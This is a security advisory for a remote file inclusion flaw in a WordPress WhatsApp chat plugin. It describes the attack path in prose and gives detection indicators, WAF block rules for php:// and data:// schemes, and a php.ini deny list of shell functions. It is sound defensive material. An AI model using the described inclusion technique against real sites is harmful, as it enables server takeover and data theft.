CVE-2025-39411: WhatsApp Click to Chat Plugin RCE Flaw

CVE-2025-39411 Overview

CVE-2025-39411 is a PHP Remote File Inclusion (RFI) vulnerability in the Indie_Plugins WhatsApp Click to Chat Plugin for WordPress (wpt-whatsapp). The flaw affects all plugin versions up to and including 2.2.12. It is classified under CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program.

An attacker can manipulate a filename parameter passed to a PHP include or require statement, causing the plugin to load attacker-controlled code. Successful exploitation requires user interaction and high attack complexity but yields full impact on confidentiality, integrity, and availability.

Critical Impact

Successful exploitation enables arbitrary PHP code execution on the WordPress host, leading to full site compromise, data theft, and lateral movement.

Affected Products

• Indie_Plugins WhatsApp Click to Chat Plugin for WordPress (wpt-whatsapp) versions n/a through 2.2.12
• WordPress installations with the wpt-whatsapp plugin enabled
• Any hosting environment running the affected plugin version

Discovery Timeline

• 2025-05-19 - CVE-2025-39411 published to NVD
• 2026-04-23 - Last updated in NVD database

Technical Details for CVE-2025-39411

Vulnerability Analysis

The vulnerability stems from improper control over a filename argument supplied to a PHP file inclusion statement within the wpt-whatsapp plugin. When user-controlled input reaches an include, include_once, require, or require_once call without sanitization or allowlisting, PHP interprets and executes the referenced file as code.

In an RFI scenario, the loaded file can originate from a remote URL or a local path the attacker has populated. The result is arbitrary PHP code execution in the context of the web server process. According to the EPSS model, the vulnerability has a probability score of 0.561% (68th percentile) for exploitation activity.

Root Cause

The plugin passes externally influenced data into a PHP file inclusion function without validating the resolved path against a known-good list. PHP's file inclusion functions resolve relative paths, URL wrappers, and protocol streams when permitted by configuration, which expands the attack surface.

Attack Vector

The attack vector is network-based. Exploitation requires user interaction, such as enticing an authenticated WordPress user or administrator to visit a crafted URL that triggers the vulnerable code path. The attacker supplies a parameter pointing to a malicious payload, which the plugin then includes and executes. Detailed advisory information is available in the Patchstack WordPress Vulnerability Report.

No public proof-of-concept exploit code is currently associated with this CVE.

Detection Methods for CVE-2025-39411

Indicators of Compromise

• Unexpected outbound HTTP/HTTPS requests from the WordPress server to attacker-controlled hosts during page rendering
• New or modified PHP files in the wp-content/plugins/wpt-whatsapp/ directory or in WordPress upload paths
• Web server access logs containing query parameters with values resembling URLs, php://, data://, or path traversal sequences targeting wpt-whatsapp endpoints
• Anomalous PHP processes spawning shell commands or network connections

Detection Strategies

• Inspect WordPress and reverse proxy logs for requests to wpt-whatsapp files containing suspicious filename parameters
• Deploy a Web Application Firewall (WAF) ruleset that flags PHP wrapper schemes and externally hosted include targets
• Compare plugin file hashes against a known-good baseline of version 2.2.12 or earlier to identify tampering

Monitoring Recommendations

• Forward WordPress, PHP-FPM, and web server logs to a centralized SIEM for correlation and retention
• Alert on PHP worker processes that initiate unexpected outbound connections or write to plugin directories
• Track plugin inventory and version drift across WordPress estates to identify unpatched installations

How to Mitigate CVE-2025-39411

Immediate Actions Required

• Identify all WordPress sites running the wpt-whatsapp plugin and confirm whether the version is 2.2.12 or earlier
• Disable the WhatsApp Click to Chat Plugin until a patched release is installed
• Restrict administrative access to WordPress and require multi-factor authentication to limit user-interaction attack paths
• Review the affected hosts for signs of compromise before restoring the plugin

Patch Information

At the time of publication, the NVD entry references the Patchstack WordPress Vulnerability Report as the authoritative source for fix availability. Administrators should upgrade to a plugin release later than 2.2.12 once published by the vendor and verify the new version on every affected site.

Workarounds

• Remove or deactivate the wpt-whatsapp plugin and replace it with a maintained alternative if a patched version is unavailable
• Set allow_url_include=Off and allow_url_fopen=Off in php.ini to block remote URL inclusion via PHP wrappers
• Apply WAF rules that block requests carrying http://, https://, ftp://, php://, or data:// schemes in query parameters
• Enforce least privilege on the web server user to limit damage if code execution occurs

; php.ini hardening to mitigate PHP Remote File Inclusion
allow_url_include = Off
allow_url_fopen = Off
open_basedir = "/var/www/html:/tmp"
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen"